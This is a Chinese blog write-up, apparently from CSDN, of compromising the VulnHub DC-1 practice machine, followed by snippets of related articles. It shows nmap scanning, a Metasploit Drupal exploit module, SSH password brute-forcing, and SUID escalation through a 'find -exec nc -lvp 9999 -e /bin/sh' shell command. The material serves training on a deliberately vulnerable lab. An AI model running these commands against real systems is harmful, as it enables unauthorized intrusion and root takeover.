VulnHub之dc1靶场(3)

最新推荐文章于 2025-10-28 15:29:24 发布
原创 最新推荐文章于 2025-10-28 15:29:24 发布 · 271 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #python #shell

本文分享了如何通过Nmap扫描、弱口令爆破、漏洞复现,利用Drupal远程代码执行漏洞,最终实现SUID提权并获取反弹shell的过程,涉及技术包括Apache、PHP、Drupal和Metasploit。 
靶场信息:

地址:https://www.vulnhub.com/entry/dc-1-1,292/
难度:简单
目标:有五个标志,但是最终目标是在根目录的主目录中找到并读取该标志
运行:vm work

信息收集

nmap直接扫描网段存活主机
在这里插入图片描述
扫描常见端口

nmap  10.7.10.29  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-19 04:14 EST
Nmap scan report for 10.7.10.29
Host is up (0.0021s latency).
Not shown: 995 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
111/tcp open  rpcbind

Nmap done: 1 IP address (1 host up) scanned in 17.50 seconds

爆破弱口令,访问网页,扫描目录
在这里插入图片描述
收集指纹:

中间件:apache 2.2.22
语言:php 5.4.45
cms:drupal 7

漏洞复现

信息泄露

http://10.7.10.29/robots.txt在这里插入图片描述

远程代码执行漏洞

search Drupal
use exploit/unix/webapp/drupal_drupalgeddon2
show options
set rhosts 10.7.10.29
run

我msf老是返回这个,呜呜呜
在这里插入图片描述

弱口令

回去查看爆破内容
在这里插入图片描述
直接登陆ssh在这里插入图片描述
登陆成功,但是/root目录没有权限
在这里插入图片描述

suid提权

尝试找到具有root权限的suid
在这里插入图片描述
发现为root可以利用
在这里插入图片描述
执行成功
在这里插入图片描述
首先执行find flag4.txt -exec nc -lvp 9999 -e /bin/sh \;
反弹shell到我的linux上
在这里插入图片描述
反弹成功,跳到root目录下在这里插入图片描述
参考文章:
https://blog.youkuaiyun.com/adminuil/article/details/101269264
https://blog.youkuaiyun.com/weixin_40860777/article/details/105118966

suid提权:https://blog.youkuaiyun.com/qq_36119192/article/details/84872644

vulnhub靶场DC1通关介绍】
qq_55213436的博客
07-09 1042
吾日三省吾身:学到了什么?不会什么?能干什么?额:学了啥?都不会?能干饭?哈哈哈哈!又到了检验学习成果的时候了,这不得拿拿著名的vulnhub网站上面的靶场来试试手,首选经典的DC系列;话不多说,就搞dc1。......
Vulnhub系列之DC1靶场详解
weixin_50053818的博客
05-04 3931
文章目录环境drupal 7.x漏洞拿flag1在目录中找配置文件拿flag2改密码进网站拿flag2ssh爆破拿flag4提权拿最后的flag 环境 DC-1靶场 VMware虚拟机 kali drupal 7.x漏洞拿flag1 首先搭建好靶场。这次一次黑盒靶场测试,只能从虚拟机中查看DC1靶场的mac地址,从而查出目标靶机的IP。 所以目标IP地址为192.168.31.184,直接上nmap进行目标全面扫描。 由nmap扫描可以知道,目标靶机开放了22,80,111,42875端口,看到端
DC-1靶场
mlws1900的博客
03-21 1793
下载地址把桥接设置为nat模式,打开靶机的时候会提示几个错误,点击重试即可启动靶机,如下图所示即可。
DC1 靶场通关及溯源分析
最新发布
yiduiguwen的专栏
10-28 732
本文从溯源角度分析DC1靶场渗透过程。首先通过hydra爆破获得密码后,详细记录了攻击前后系统状态变化:msf利用Drupal 7.0漏洞建立会话后,观察到异常网络连接(59148→4444端口)和两个可疑php进程;通过解码apache日志发现回连信息。在获取flag过程中,利用数据库配置文件找到凭证,修改admin密码哈希值登录系统。最后通过分析/var/log/auth.log验证了ssh爆破痕迹。文中包含关键命令如提权操作、密码哈希生成和数据库修改等,完整呈现了攻击链和相应的取证分析方法。
DC-1 - 靶场
m0_62798356的博客
12-09 1640
1.nmap,arp-scan使用2.whatweb 指纹识别3.msf使用对应的模块4.mysql的修改数据5.SUID提权。
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4975
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
VulnHub DC1靶机渗透测试
weixin_44614631的博客
08-25 1383
VulnHub DC1靶机进行渗透测试。最终,得到了四个flag和一个thefinalflag,共5个flag。有两个问题不是特别清楚,需要再进一步学习。 根据网络上两篇博文学习,总结。如果有版权问题,请联系我进行修改或删除...
vulnhub靶场 DC-1靶机 渗透详细过程
黑战士的博客
07-26 1560
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec。
vulnhubDC1靶机
LainWith的博客
08-15 1389
靶机概览信息收集nmap信息收集网站信息收集使用nikto来收集一下渗透攻击查找漏洞 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC1的MAC,这样做主机发现时可以通过MAC来过滤靶机。 nmap信息收集 1:使用nma.
DC靶场系列-DC1靶场-渗透测试靶场
03-09
DC靶场系列-DC1靶场-渗透测试靶场 仅限于练习使用!!!
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 4645
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
Vulnhub靶机渗透测试——DC-1
Cobra的博客
04-12 2721
Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描进行主机发现 nmap 192.168.189.0/24 2、发现IP为192.168.189.172主机开放80和22等端口,访问其80端口 三、漏洞利用 1、发现该站点是由Drupal搭建,利用msf进行漏洞利用 use exploit/unix/webapp/drupal_drupalgedd
vulnhub靶场-DC-1-详解
chinese_cabbage0的博客
12-02 1246
DC-1的解析 思路
DC靶场系列--DC1
BGiscool的博客
06-28 6165
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
DC1靶场 Drupal
m0_62438849的博客
03-02 1418
22端口是开放的,试试ssh登录呢, ssh 客户端用户名@服务器ip地址,我本来想以刚才的admin和1111111试试能否登录,不能登录。find / -perm -4000 2>/dev/null寻找 4000权限的文件,不显示其他的错误信息相当于过滤。点击Dashboard,看到flag3,特殊的访问权限将能帮助找到密码,需要执行命令行,在/etc/shadow。内容格式:x表示此用户设有密码,但不是真正的密码,真正的密码保存在 /etc/shadow 文件中。
vulnhub靶机渗透DC-1
RestoreJustice的博客
03-17 648
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里提权我们可以考虑爆破22端口或者内核提权(绝招,实在没办法在考虑),但在此之前我们可以尝试找找是否有一些拥有suid标识的命令,利用其提权。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.3.27。而且是几年前的,可以考虑使用MSF,上面应该集成了相关漏洞利用脚本,如果没有就得手工利用了。
vuln靶场——DC-1
qq_54480761的博客
05-03 1953
我们切换语句进入shell,执行whoami查看当前的权限,执行ls查看当前目录下的文件,切换到root目录。典型的drupal,启动Metersploit,MSF存在drupal模块,尝试使用msf渗透。查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件。搜索Drupal 7的漏洞发现可利用的漏洞很多,搜索与Drupal 7相关的漏洞利用模块。登陆战点之后,随便点几个选项,例如左上角的Content,发现flag3。进行登录,密码是之前我们自己替换的。
vulnhub dc1
01-14
### VulnHub DC-1 渗透测试实验环境下载与指导 #### 实验环境概述 VulnHub上的DC-1是一个面向初学者的虚拟机镜像,旨在提供一个安全的学习环境来练习基本的渗透测试技能。该靶机运行Ubuntu操作系统,并部署了一个存在多个漏洞的应用程序——Drupal 7网站。 #### 下载指南 为了获取DC-1的实验环境,访问[VulnHub官方网站](https://www.vulnhub.com/)并搜索“DC-1”。按照页面指示下载对应的OVA文件,此文件适用于VirtualBox或VMware等虚拟化软件安装使用[^1]。 #### 测试前准备 确保攻击者使用的Kali Linux系统已经正确配置网络设置以便能够与目标机器通信。通常情况下,建议采用NAT模式或者桥接模式连接至同一局域网内[^2]。 #### 初始信息收集 启动虚拟机之后,可以先执行简单的主机发现操作,比如使用`ping`命令确认目标存活状态;接着运用工具如`nmap`进行全面端口和服务扫描: ```bash nmap -A 192.168.189.172 ``` 上述命令将会返回有关开放端口以及可能存在的服务版本的信息,这对于后续攻击路径的选择至关重要[^3]。 #### Web应用分析 根据前期侦察得知,Web服务器托管着一个Drupal CMS实例。考虑到这是较旧版本(Drupal 7),可能存在已知的安全缺陷。此时可查阅CVE数据库或其他资源了解针对此类系统的具体攻击向量[^4]。 #### 获取初始Shell 一旦识别到可用漏洞,则可通过Metasploit框架快速建立远程会话。例如,如果选择了某个适合于Drupal 7.x的exploit模块,那么只需指定RHOST参数指向受害者的IP地址即可尝试入侵[^5]。 #### 提升权限 成功植入后门并不意味着结束战斗。接下来的任务是要设法提升当前用户的权限级别直至root账户。这一步骤往往涉及寻找具有SUID位设定的二进制文件并通过它们实施本地提权技巧。例如,利用`find`命令定位潜在的目标对象: ```bash find / -perm -u=s -type f 2>/dev/null ``` 以上代码片段用于遍历整个文件系统树结构,过滤出那些设置了SETUID标志且属于常规类型的节点[^6]。 #### 寻找Flag文件 在整个过程中,参与者需留意任何关于隐藏标记(flags)位置的线索提示。这些flag通常被放置在特定目录下作为完成各个阶段挑战任务的关键证明材料。对于本案例而言,至少存在五个不同级别的flag等待探索者去发掘[^7]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值